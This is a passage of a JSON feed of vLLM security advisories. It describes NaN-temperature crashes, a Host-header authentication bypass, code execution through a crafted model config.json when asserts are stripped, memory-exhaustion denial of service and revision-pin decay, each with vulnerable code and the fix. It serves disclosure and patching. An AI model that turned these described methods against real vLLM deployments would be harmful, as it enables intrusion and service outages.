https://github.com/vllm-project/vllm/pull/44974","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-17T14:02:42.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.8,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-8jr5-v98p-w75m","https://github.com/vllm-project/vllm/pull/44974","https://github.com/vllm-project/vllm/commit/cf1c90672404548aa3bc51f92c4745576a65ee26","https://nvd.nist.gov/vuln/detail/CVE-2026-12491","https://access.redhat.com/security/cve/CVE-2026-12491","https://bugzilla.redhat.com/show_bug.cgi?id=2489786","https://github.com/advisories/GHSA-8jr5-v98p-w75m","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-3406.yaml","https://github.com/vllm-project/vllm","https://pypi.org/project/vllm"],"source_kind":"github","identifiers":["GHSA-8jr5-v98p-w75m","CVE-2026-12491"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T15:00:08.452Z","updated_at":"2026-10-02T15:01:58.031Z","epss_percentage":0.00239,"epss_percentile":0.13538,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04anI1LXY5OHAtdzc1bc4ABY4R","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04anI1LXY5OHAtdzc1bc4ABY4R","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.24.0","vulnerable_version_range":"\u003e= 0.11.0, \u003c 0.24.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04anI1LXY5OHAtdzc1bc4ABY4R/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03aDRwLXJmZmctNzgyM84ABY4Q","url":"https://github.com/advisories/GHSA-7h4p-rffg-7823","title":"vLLM: temperature=NaN and temperature=Infinity bypass validation and propagate to GPU kernels","description":"## Summary\n\nAll temperature validation gates use comparison operators (`\u003c`, `\u003e`), which silently evaluate to `False` for `NaN` and for positive `Infinity` in Python's IEEE 754 float semantics. Both values pass every guard and propagate to GPU sampling kernels, where they produce undefined behavior or CUDA errors that can crash the inference worker. Note: `-Infinity` is correctly caught.\n\n## Root Cause\n\n`sampling_params.py:384`:\n```python\nif 0 \u003c self.temperature \u003c _MAX_TEMP:  # NaN → False; +Inf → False\n```\n\n`sampling_params.py:462`:\n```python\nif self.temperature \u003c 0.0:            # NaN → False; +Inf → False\n    raise VLLMValidationError(...)\n```\n\nNo `math.isnan()` or `math.isinf()` check exists anywhere in `sampling_params.py`.\n\nPython semantics (verified): `float('nan') \u003c 0.0` → `False`, `float('inf') \u003c 0.0` → `False`.\n\n\n## Impact\n\nCrash of inference worker on GPU kernel execution with NaN/Inf softmax input, degrading service for all concurrent users.\n\n## Remediation\n\nAdd `math.isfinite(self.temperature)` check in `_verify_args()`. Reject non-finite float values with a 400 error.\n\n## Fix\n\nA fix for this vulnerability was merged here: https://github.com/vllm-project/vllm/pull/45116","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-17T14:02:22.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.9,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-7h4p-rffg-7823","https://github.com/vllm-project/vllm/pull/45116","https://github.com/vllm-project/vllm/commit/d598d239737cfa37bcfcb98886ec3f3557fc7198","https://nvd.nist.gov/vuln/detail/CVE-2026-54235","https://github.com/advisories/GHSA-7h4p-rffg-7823","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-3405.yaml","https://github.com/vllm-project/vllm","https://pypi.org/project/vllm"],"source_kind":"github","identifiers":["GHSA-7h4p-rffg-7823","CVE-2026-54235"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T15:00:08.452Z","updated_at":"2026-09-28T20:01:49.023Z","epss_percentage":0.0045,"epss_percentile":0.36589,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03aDRwLXJmZmctNzgyM84ABY4Q","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03aDRwLXJmZmctNzgyM84ABY4Q","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.24.0","vulnerable_version_range":"\u003e= 0.8.5, \u003c= 0.23.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03aDRwLXJmZmctNzgyM84ABY4Q/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05NGY0LWhyNzYtcDVqNs4ABY0L","url":"https://github.com/advisories/GHSA-94f4-hr76-p5j6","title":"vLLM: OpenAI auth bypass","description":"### Summary\n\nA vulnerability in ASGI web servers and starlette's trust on those web servers enables an authentication bypass of the OpenAI API `AuthenticationMiddleware`, which was discovered during @x41sec's source code audit.\nIt allows to use the API without providing the configured `VLLM_API_KEY` or `--api-key`.\n\n### Details\n\nIn https://github.com/vllm-project/vllm/blob/v0.14.0/vllm/entrypoints/openai/api_server.py#L689-L692 the `url_path` is taken from the `URL`, which is reconstructed by _starlette_ based on the request `scope`.\n\n```py\nfrom starlette.datastructures import URL, Headers, MutableHeaders, State\n\n# ...\n\nurl_path = URL(scope=scope).path.removeprefix(root_path)\nheaders = Headers(scope=scope)\nif url_path.startswith(\"/v1\") and not self.verify_token(headers):\n    response = JSONResponse(content={\"error\": \"Unauthorized\"}, status_code=401)\n    return response(scope, receive, send)\nreturn self.app(scope, receive, send)\n```\n\nThe request `scope` includes the request's `Host:` header and reconstructs the URL as shown below:\n\n```py\nf\"{scheme}://{host_header}{path}\"\n```\n\nNeither starlette nor [any of the ASGI servers](https://asgi.readthedocs.io/en/latest/implementations.html#servers) (including uvicorn, which vllm uses) properly filter the `Host:` header for invalid characters. This allows an attacker to include special URL characters such as `/` or `?` in the `Host:` header and thereby control the reconstructed URL and it's `.path` attribute.\n\nFastAPI/starlette's routing uses the HTTP path and does not depend on the parsed url.path attribute, allowing attackers to reach an endpoint via a certain path while providing a different value in the `.path`.\n\n### Impact\n- Instances of vllm that use an API Key for the OpenAI API and expose the API to attackers.\n- Instances behind an RFC-conforming web server (such as nginx) are **not** affected.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2026-06-16T17:36:41.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-94f4-hr76-p5j6","https://github.com/vllm-project/vllm/pull/43426","https://x41-dsec.de/lab/advisories/x41-2026-002-starlette","https://nvd.nist.gov/vuln/detail/CVE-2026-48746","https://access.redhat.com/errata/RHSA-2026:30088","https://access.redhat.com/errata/RHSA-2026:30089","https://access.redhat.com/errata/RHSA-2026:36005","https://access.redhat.com/errata/RHSA-2026:36006","https://access.redhat.com/security/cve/CVE-2026-48746","https://bugzilla.redhat.com/show_bug.cgi?id=2491581","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-226.yaml","https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-48746.json","https://access.redhat.com/errata/RHSA-2026:42132","https://access.redhat.com/errata/RHSA-2026:42142","https://access.redhat.com/errata/RHSA-2026:42644","https://access.redhat.com/errata/RHSA-2026:43038","https://access.redhat.com/errata/RHSA-2026:61629","https://access.redhat.com/errata/RHSA-2026:61627","https://github.com/advisories/GHSA-94f4-hr76-p5j6"],"source_kind":"github","identifiers":["GHSA-94f4-hr76-p5j6","CVE-2026-48746"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-16T18:00:08.347Z","updated_at":"2026-09-23T10:02:13.199Z","epss_percentage":0.01152,"epss_percentile":0.65554,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05NGY0LWhyNzYtcDVqNs4ABY0L","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05NGY0LWhyNzYtcDVqNs4ABY0L","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.22.0","vulnerable_version_range":"\u003e= 0.3.0, \u003c 0.22.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05NGY0LWhyNzYtcDVqNs4ABY0L/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1xOGdxLTM3N3AtanEzcs4ABY0H","url":"https://github.com/advisories/GHSA-q8gq-377p-jq3r","title":"vLLM: Security Check Bypass via assert Statement in Activation Function Loading Allows Arbitrary Code Execution","description":"### Summary\n\nAn `assert`-based security check in vLLM's activation function loading allows any unauthenticated attacker to achieve arbitrary code execution on the server by publishing a malicious HuggingFace model, when vLLM runs in Python optimized mode (`python -O` or `PYTHONOPTIMIZE=1`).\n\n### Details\n\nvLLM uses an `assert` statement at [`vllm/model_executor/layers/pooler/activations.py:48`](https://github.com/vllm-project/vllm/blob/main/vllm/model_executor/layers/pooler/activations.py#L48) as its sole security control to restrict which activation functions can be loaded from a HuggingFace model's `config.json`:\n\n```python\n# vllm/model_executor/layers/pooler/activations.py:35-53\nfunction_name: str | None = None\nif (\n    hasattr(config, \"sentence_transformers\")\n    and \"activation_fn\" in config.sentence_transformers\n):\n    function_name = config.sentence_transformers[\"activation_fn\"]\nelif (\n    hasattr(config, \"sbert_ce_default_activation_function\")\n    and config.sbert_ce_default_activation_function is not None\n):\n    function_name = config.sbert_ce_default_activation_function\n\nif function_name is not None:\n    assert function_name.startswith(\"torch.nn.modules.\"), (\n        \"Loading of activation functions is restricted to \"\n        \"torch.nn.modules for security reasons\"\n    )\n    fn = resolve_obj_by_qualname(function_name)()\n```\n\nPython's `assert` statements are stripped at compile time when running in optimized mode (`python -O` or `PYTHONOPTIMIZE=1`). When the assert is absent, the attacker-controlled `function_name` from the model's `config.json` is passed directly to [`resolve_obj_by_qualname()`](https://github.com/vllm-project/vllm/blob/main/vllm/utils/import_utils.py#L106) — an unrestricted import gadget:\n\n```python\ndef resolve_obj_by_qualname(qualname: str) -\u003e Any:\n    module_name, obj_name = qualname.rsplit(\".\", 1)\n    module = importlib.import_module(module_name)\n    return getattr(module, obj_name)\n```\n\nThis is the same vulnerability class as **CVE-2017-1000433** (pysaml2 assert-based auth bypass), flagged by Bandit B101 and Ruff S101, and the reason Django proactively replaced all assert-based security checks (ticket #32508).\n\n**Attacker-controlled input sources:**\n- `config.sentence_transformers[\"activation_fn\"]` (line 40)\n- `config.sbert_ce_default_activation_function` (line 45)\n\n**Affected call sites** — `get_act_fn()` is called via `resolve_classifier_act_fn()` from:\n- `vllm/model_executor/layers/pooler/seqwise/poolers.py:122` — SequencePooler\n- `vllm/model_executor/layers/pooler/tokwise/poolers.py:130` — TokenPooler\n\n**Broader systemic risk:** `resolve_obj_by_qualname` is called from ~20 locations across the codebase with no validation of its own. Any future caller feeding user-controlled input to it without validation creates the same vulnerability class.\n\n**Suggested fix:** Replace the `assert` with an explicit conditional raise:\n\n```python\nif not function_name.startswith(\"torch.nn.modules.\"):\n    raise ValueError(\n        \"Loading of activation functions is restricted to \"\n        \"torch.nn.modules for security reasons\"\n    )\n```\n\n### Impact\n\n**Arbitrary code execution.** A malicious model author publishes a HuggingFace model with a crafted `config.json`. When a victim loads this model with vLLM running under `python -O` or `PYTHONOPTIMIZE=1`, arbitrary code executes during model initialization with the privileges of the vLLM process.\n\nThe attack requires:\n1. Victim loads a malicious model from HuggingFace (user interaction)\n2. vLLM runs under `python -O` or `PYTHONOPTIMIZE=1` (documented in production use)\n3. Model uses a cross-encoder architecture (e.g. BERT or RoBERTa with sequence classification)\n\n**Coordinated disclosure note:** This vulnerability was also reported via huntr.com on April 2, 2026 (https://huntr.com/bounties/dcb05b04-e625-41e7-adbc-bbae0cc2d64c). A GitHub Security Advisory was also filed because it is vLLM's stated preferred disclosure channel per SECURITY.md.\n\n### Fix\n\nA fix for this was introduced in this commit: https://github.com/vllm-project/vllm/commit/b3c7ffcab82c2439726f8cb213800f6f38c023d3","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-16T17:34:49.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-q8gq-377p-jq3r","https://github.com/vllm-project/vllm/commit/b3c7ffcab82c2439726f8cb213800f6f38c023d3","https://huntr.com/bounties/dcb05b04-e625-41e7-adbc-bbae0cc2d64c","https://nvd.nist.gov/vuln/detail/CVE-2026-41523","https://access.redhat.com/errata/RHSA-2026:36005","https://access.redhat.com/errata/RHSA-2026:36006","https://access.redhat.com/security/cve/CVE-2026-41523","https://bugzilla.redhat.com/show_bug.cgi?id=2491582","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2300.yaml","https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-41523.json","https://access.redhat.com/errata/RHSA-2026:57380","https://access.redhat.com/errata/RHSA-2026:57390","https://access.redhat.com/errata/RHSA-2026:57387","https://access.redhat.com/errata/RHSA-2026:57389","https://access.redhat.com/errata/RHSA-2026:59151","https://access.redhat.com/errata/RHSA-2026:59144","https://access.redhat.com/errata/RHSA-2026:59139","https://access.redhat.com/errata/RHSA-2026:59138","https://access.redhat.com/errata/RHSA-2026:61629","https://access.redhat.com/errata/RHSA-2026:61627","https://access.redhat.com/errata/RHSA-2026:62336","https://access.redhat.com/errata/RHSA-2026:62335","https://github.com/advisories/GHSA-q8gq-377p-jq3r"],"source_kind":"github","identifiers":["GHSA-q8gq-377p-jq3r","CVE-2026-41523"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-16T18:00:08.347Z","updated_at":"2026-09-30T09:02:45.608Z","epss_percentage":0.00913,"epss_percentile":0.58506,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xOGdxLTM3N3AtanEzcs4ABY0H","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xOGdxLTM3N3AtanEzcs4ABY0H","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.22.0","vulnerable_version_range":"\u003c 0.22.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xOGdxLTM3N3AtanEzcs4ABY0H/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS13Y3dnLWM1ZmMtOXZyY84ABYjD","url":"https://github.com/advisories/GHSA-wcwg-c5fc-9vrc","title":"vLLM is vulnerable to an Out-of-Memory (OOM) Denial of Service (DoS) attack due to unbounded frame count processing in the `VideoMediaIO.load_base64()` method","description":"vLLM versions 0.8.0 and later are vulnerable to an Out-of-Memory (OOM) Denial of Service (DoS) attack due to unbounded frame count processing in the `VideoMediaIO.load_base64()` method. When processing `video/jpeg` data URLs, the method splits the base64 data string on commas to extract individual JPEG frames without enforcing a frame count limit. An attacker can exploit this by crafting a single API request containing thousands of comma-separated base64-encoded JPEG frames in a data URL, causing the server to decode all frames into memory and crash due to excessive memory consumption. This vulnerability is reachable via the OpenAI-compatible chat completions API and does not require authentication.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-11T12:32:44.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2026-5497","https://github.com/vllm-project/vllm/commit/58ee61422169ce17e08248f8efa1e9df434fe395","https://huntr.com/bounties/7bd92629-b396-4449-8f88-6c0092530eb4","https://access.redhat.com/security/cve/CVE-2026-5497","https://bugzilla.redhat.com/show_bug.cgi?id=2487813","https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-5497.json","https://access.redhat.com/errata/RHSA-2026:33524","https://access.redhat.com/errata/RHSA-2026:33531","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2302.yaml","https://github.com/advisories/GHSA-wcwg-c5fc-9vrc"],"source_kind":"github","identifiers":["GHSA-wcwg-c5fc-9vrc","CVE-2026-5497"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-18T21:00:07.658Z","updated_at":"2026-09-25T12:01:05.306Z","epss_percentage":0.00896,"epss_percentile":0.5781,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13Y3dnLWM1ZmMtOXZyY84ABYjD","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS13Y3dnLWM1ZmMtOXZyY84ABYjD","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.19.0","vulnerable_version_range":"\u003e= 0.8.0, \u003c 0.19.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13Y3dnLWM1ZmMtOXZyY84ABYjD/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zd3c0LTVqdjktajVnbc4ABYhN","url":"https://github.com/advisories/GHSA-3ww4-5jv9-j5gm","title":"vLLM's Artifact Pin Decay allows pinned deployments to load unpinned code, weights, and processors","description":"### Summary\n\nvLLM's revision pinning controls do not consistently apply to all artifacts loaded for a model. A deployment that supplies `--revision` or `--code-revision` can still load dynamic code, GGUF files, image processors, retrieval side weights, or same-repository subfolder weights/config from an unpinned/default revision.\n\nThis is a supply-chain integrity issue for pinned vLLM deployments. Operators can believe they are serving a reviewed model revision while vLLM resolves behavior-affecting nested or sibling artifacts outside that reviewed revision.\n\n### Details\n\nThe expected invariant is:\n\n\u003e When a vLLM operator supplies a model or code revision pin, every code, config, processor, weight file, side weight, and same-repository subfolder artifact loaded as part of that model should resolve under that pin unless vLLM exposes and enforces a separate explicit pin for that artifact.\n\nCurrent `main` was verified affected at commit `3795d7acf431980e62e738493f437ae2a51549da`.\n\nAffected source boundaries:\n\n- `vllm/model_executor/models/registry.py:1045-1051` and `:1058-1064`\n  - `_try_resolve_transformers()` passes `revision=model_config.revision` and `trust_remote_code=model_config.trust_remote_code`, but omits `code_revision=model_config.code_revision` for external `auto_map` dynamic module imports.\n- `vllm/model_executor/model_loader/gguf_loader.py:58-60`\n  - The direct-file GGUF form `repo/file.gguf` calls `hf_hub_download(repo_id=repo_id, filename=filename)` without passing `revision`.\n- `vllm/model_executor/models/roberta.py:203-209`\n  - BGE-M3 secondary sparse and ColBERT side weights are declared with `revision=None`.\n- `vllm/model_executor/models/kimi_k25.py:111-114`\n  - Kimi-K2.5 calls `cached_get_image_processor()` without passing `model_config.revision`.\n- `vllm/model_executor/models/kimi_audio.py:92-95`\n  - Kimi-Audio loads Whisper config from the `whisper-large-v3` subfolder without a `revision` argument.\n- `vllm/model_executor/models/kimi_audio.py:425-430`\n  - Kimi-Audio declares same-repository `whisper-large-v3` secondary weights with `revision=None`.\n- `vllm/model_executor/model_loader/default_loader.py:287-301`\n  - The default loader preserves `model_config.revision` for the primary source, then consumes model-supplied secondary sources as declared.\n\nThe strongest example is Kimi-Audio: the primary `moonshotai/Kimi-Audio-7B-Instruct` weights preserve the configured model revision, but the same-repository `whisper-large-v3` audio tower config/weights do not. A pinned Kimi-Audio deployment can therefore load the Whisper subfolder outside the audited revision.\n\nThis report does not claim a `trust_remote_code=False` bypass, unauthenticated RCE, or real artifact compromise. The issue is improper propagation of explicit artifact pins across supported loader paths.\n\n### Impact\n\nAffected users are operators who pin vLLM model deployments to a reviewed Hugging Face revision for safety review, provenance, rollback, or reproducibility. The impact is that the pin does not reliably describe the full set of artifacts vLLM serves. Even when the operator selects an audited revision, vLLM can resolve behavior-affecting secondary artifacts from the repository default branch or another mutable ref.\n\nDepending on the model path, the unpinned artifact can be dynamic model code, a GGUF file, an image processor, retrieval side weights, or the same-repository Kimi-Audio Whisper subfolder weights/config.\n\nThis breaks the operational guarantee of a pinned deployment: \"serve the exact artifact set I reviewed.\" A later change to an unpinned secondary artifact can alter model behavior without changing the operator's configured revision, making review, rollback, incident response, and audit records unreliable.\n\n### Occurrences\n\n- `vllm/model_executor/models/kimi_k25.py` L111-L114 — Kimi-K2.5 loads its image processor with `cached_get_image_processor()` but does not pass `self.ctx.model_config.revision`. The processor can therefore resolve from the default repository revision even when the model deployment is pinned.\n- `vllm/model_executor/models/kimi_audio.py` L425-L430 — Kimi-Audio declares same-repository `whisper-large-v3` secondary weights with `revision=None`. A pinned Kimi-Audio deployment can therefore load the Whisper audio tower weights from an unpinned/default revision.\n- `vllm/model_executor/models/kimi_audio.py` L92-L95 — Kimi-Audio loads Whisper config from the same repository's `whisper-large-v3` subfolder without passing the top-level model revision. The config for this behavior-affecting subcomponent can be resolved outside the audited model revision.\n- `vllm/model_executor/models/registry.py` L1058-L1064 — The later dynamic model-class resolution repeats the same pin-decay pattern: it forwards `revision` and `trust_remote_code`, but omits `code_revision`. This means an operator-provided code pin is not enforced at the dynamic module loader boundary.\n- `vllm/model_executor/model_loader/gguf_loader.py` L58-L60 — The direct GGUF form `repo/file.gguf` calls `hf_hub_download(repo_id=repo_id, filename=filename)` without passing `model_config.revision`. A deployment that pins the model revision can therefore resolve this GGUF file from the repository default revision.\n- `vllm/model_executor/models/registry.py` L1045-L1051 — `try_get_class_from_dynamic_module()` is called for external `auto_map` config/model classes with `revision=model_config.revision`, but without forwarding `model_config.code_revision`. When `--code-revision` is set, this dynamic module resolution can still fall back to the default code revision instead of the audited code revision.\n- `vllm/model_executor/models/roberta.py` L203-L209 — `BgeM3EmbeddingModel` creates same-repository secondary sparse/ColBERT weight sources with `revision=None`. The primary model revision is not propagated to these side weights, so they can be downloaded outside the operator-selected model revision.\n\n### Fixes\n\nThis was fixed in: https://github.com/vllm-project/vllm/pull/42616\n\n___\n\nOriginally filed via huntr: https://huntr.com/bounties/3f1e24c0-87d2-4f6c-a705-820f380879ac.\n\nThe vLLM maintainer (Russell Bryant) redirected the report to the private GHSA channel. Offline proof bundle (`vllm_artifact_pin_decay_bundle_verify.py` + `bundle-verification-20260430T143506Z.json`) is available upon request.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-10T17:11:38.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-3ww4-5jv9-j5gm","https://nvd.nist.gov/vuln/detail/CVE-2026-47155","https://github.com/vllm-project/vllm/pull/42616","https://github.com/vllm-project/vllm/commit/d26a28ab033697f55a1414b5b0435de7cd6045b6","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2301.yaml","https://huntr.com/bounties/3f1e24c0-87d2-4f6c-a705-820f380879ac","https://github.com/advisories/GHSA-3ww4-5jv9-j5gm"],"source_kind":"github","identifiers":["GHSA-3ww4-5jv9-j5gm","CVE-2026-47155"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-10T18:00:08.604Z","updated_at":"2026-09-28T20:02:49.779Z","epss_percentage":0.00249,"epss_percentile":0.14507,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zd3c0LTVqdjktajVnbc4ABYhN","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zd3c0LTVqdjktajVnbc4ABYhN","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.22.0","vulnerable_version_range":"\u003c 0.22.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zd3c0LTVqdjktajVnbc4ABYhN/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05OGYzLWh3ZzQtNHJmN84ABXYs","url":"https://github.com/advisories/GHSA-98f3-hwg4-4rf7","title":"vllm has Improper Resource Shutdown or Release ","description":"A vulnerability was identified in vllm-project vllm 0.19.0. This issue affects some unknown processing of the component OpenAI-compatible Serving Path. Such manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The pull request to fix this issue awaits acceptance.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-26T15:32:10.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.5,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P","references":["https://nvd.nist.gov/vuln/detail/CVE-2026-9540","https://github.com/vllm-project/vllm/issues/37343","https://github.com/vllm-project/vllm/pull/37594","https://github.com/vllm-project/vllm","https://ingero.io/debugging-vllm-latency-minimax-ollama-mcp","https://vuldb.com/submit/814645","https://vuldb.com/vuln/365601","https://vuldb.com/vuln/365601/cti","https://github.com/advisories/GHSA-98f3-hwg4-4rf7"],"source_kind":"github","identifiers":["GHSA-98f3-hwg4-4rf7","CVE-2026-9540"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-30T18:00:08.689Z","updated_at":"2026-09-25T12:02:28.611Z","epss_percentage":0.00724,"epss_percentile":0.52008,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05OGYzLWh3ZzQtNHJmN84ABXYs","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05OGYzLWh3ZzQtNHJmN84ABXYs","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 0.19.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05OGYzLWh3ZzQtNHJmN84ABXYs/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04M3ZtLXA1MnctZjlwd84ABWWQ","url":"https://github.com/advisories/GHSA-83vm-p52w-f9pw","title":"vLLM: extract_hidden_states speculative decoding crashes server on any request with penalty parameters","description":"### Summary\n\nThe `extract_hidden_states` speculative decoding proposer in vLLM returns a tensor with an incorrect shape after the first decode step, causing a `RuntimeError` that crashes the EngineCore process. The crash is triggered when any request in the batch uses sampling penalty parameters (`repetition_penalty`, `frequency_penalty`, or `presence_penalty`).\n\nA single request with a penalty parameter (e.g., `\"repetition_penalty\": 1.1`) is sufficient to crash the server. The crash is deterministic and immediate — no concurrency, race condition, or special workload is required.\n\n### Details\n\nIn vLLM v0.17.0, the `extract_hidden_states` proposer's `propose()` method returned `sampled_token_ids.unsqueeze(-1)`, producing a tensor of shape `(batch_size, 1)`.\n\nIn [PR #37013](https://github.com/vllm-project/vllm/pull/37013) (first released in v0.18.0), the KV connector interface was refactored out of `propose()`. The return type changed from `tuple[Tensor, KVConnectorOutput | None]` to `Tensor`, and the `.unsqueeze(-1)` call was removed along with the KV connector output:\n\n```python\n# Before (v0.17.0):\nreturn sampled_token_ids.unsqueeze(-1), kv_connector_output  # shape (batch_size, 1)\n\n# After (v0.18.0+):\nreturn sampled_token_ids  # shape (batch_size, 2) after first decode step\n```\n\nThe refactor missed that `sampled_token_ids` changed semantics between the first and subsequent decode steps. After the first decode step, the rejection sampler allocates its output as `(batch_size, max_spec_len + 1)`. With `num_speculative_tokens=1`, this produces shape `(batch_size, 2)` instead of the expected `(batch_size, 1)`, causing a broadcast shape mismatch during penalty application.\n\n### Impact\n\nAny vLLM deployment between v0.18.0 and v0.19.1 (inclusive) configured with `extract_hidden_states` speculative decoding is affected. A single API request containing any penalty parameter immediately and permanently crashes the EngineCore process, resulting in complete loss of service availability.\n\n### Patches\n\nFixed in [PR #38610](https://github.com/vllm-project/vllm/pull/38610), first included in vLLM v0.20.0. The fix slices the return value to `sampled_token_ids[:, :1]`, ensuring the correct `(batch_size, 1)` shape regardless of the rejection sampler's output dimensions.\n\n### Workarounds\n\n- Upgrade to vLLM v0.20.0 or later.\n- If upgrading is not possible, avoid using `extract_hidden_states` as the speculative decoding method on affected versions.\n- Alternatively, reject or strip penalty parameters (`repetition_penalty`, `frequency_penalty`, `presence_penalty`) from incoming requests at an API gateway before they reach 